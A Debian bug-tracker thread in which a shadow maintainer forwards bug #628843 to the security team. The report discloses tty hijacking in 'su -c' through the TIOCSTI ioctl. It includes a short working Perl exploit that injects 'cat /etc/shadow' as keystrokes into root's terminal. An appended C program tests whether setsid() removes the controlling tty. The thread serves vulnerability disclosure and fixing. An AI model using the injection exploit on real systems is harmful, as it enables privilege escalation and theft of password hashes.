tags 628843 help security
thanks

Security team, I need advice and help here.

My co-maintainer for shadow, Nicolas, is more or less MIA, so I'm left nearly alone to maintain shadow. As Nicolas was also upstream, you understand how desperate my situation is..:-)

(maybe this bug will ring a bell for Nicolas, still)

My expertise is, as you may expect, way outreached.

So, in short, what I need is someone with enough expertise to look at this bug report and help decide whether adopting Redhat's patch is correct (assuming it applies: I'm not sure that RH is using the same "su" as we do).

Mail CC'ed to submitter, too, so that Daniel also knows that the only person who answers....needs help..:-)

----- Forwarded message from Daniel Ruoso <dan...@ruoso.com> -----

Date: Wed, 1 Jun 2011 15:24:47 -0400
From: Daniel Ruoso <dan...@ruoso.com>
To: Debian Bug Tracking System <sub...@bugs.debian.org>
Subject: [Pkg-shadow-devel] Bug#628843: login: tty hijacking possible in "su" via TIOCSTI ioctl
Reply-To: Daniel Ruoso <dan...@ruoso.com>, 628...@bugs.debian.org
X-CRM114-Status: Good ( pR: 39.0933 )

Package: login
Version: 1:4.1.4.2+svn3283-2+squeeze1
Severity: critical

After investigating why RedHat has a different behavior regarding "su -c", I found out that there was a patch in RedHat to prevent tty hijacking when using "su -c".

What makes the hijacking possible is that "su -c" still gives the command a controlling tty, which means it has ioctl access to /dev/tty. This means it can send things to the tty input buffer, which will be read just after su ends.

The original report (with patch) on RedHat (from 2005?!?!?!) is:

https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=173008

A very simple exploit follows (Perl code)

____BEGIN_CODE____
#!/usr/bin/perl
require "sys/ioctl.ph";
open my $tty_fh, '<', '/dev/tty' or die $!;
foreach my $c (split //, 'cat /etc/shadow'.$/) {
    ioctl($tty_fh, &TIOCSTI, $c);
}
____END_CODE____

The scenario is: Root runs a command as a less privileged user with "su -c"; if the user was compromised, the script will be able to run commands as root by injecting keystrokes on the terminal.

-- System Information:
Debian Release: 6.0.1
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages login depends on:
ii  libc6           2.11.2-10  Embedded GNU C Library: Shared lib
ii  libpam-modules  1.1.1-6.1  Pluggable Authentication Modules f
ii  libpam-runtime  1.1.1-6.1  Runtime support for the PAM librar
ii  libpam0g        1.1.1-6.1  Pluggable Authentication Modules l

login recommends no packages.

login suggests no packages.

-- no debconf information

_______________________________________________
Pkg-shadow-devel mailing list
pkg-shadow-de...@lists.alioth.debian.org
http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-shadow-devel

----- End forwarded message -----

--
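The report attributes the problem to the command keeping a controlling tty. The following C program is an added example, not part of the original mail and not the RedHat patch or shadow's code: it checks whether a child process can still open /dev/tty when it inherits the caller's session versus after it calls setsid(). The helper name child_can_open_ctty is hypothetical.

```c
/* Added example: verifies that a child placed in a new session with
 * setsid() has no controlling tty and so cannot open /dev/tty, the
 * descriptor the report says "su -c" leaves reachable. */
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper. Forks; the child optionally calls setsid() and
 * then tries to open /dev/tty. Returns 1 if the open succeeded, 0 if it
 * failed, -1 if fork, setsid or waitpid failed. */
int child_can_open_ctty(int detach)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* A freshly forked child is never a process group leader,
         * so setsid() is permitted here. */
        if (detach && setsid() == (pid_t)-1)
            _exit(2);
        int fd = open("/dev/tty", O_RDONLY | O_NOCTTY);
        if (fd >= 0) {
            close(fd);
            _exit(1);   /* controlling tty still reachable */
        }
        _exit(0);       /* no controlling tty */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    int rc = WEXITSTATUS(status);
    return rc == 2 ? -1 : rc;
}

int main(void)
{
    printf("inherited session: /dev/tty %s\n",
           child_can_open_ctty(0) == 1 ? "opens" : "not available");
    printf("after setsid():    /dev/tty %s\n",
           child_can_open_ctty(1) == 1 ? "opens" : "not available");
    return 0;
}
```

Run from an interactive shell, the first line reports that /dev/tty opens and the second that it does not.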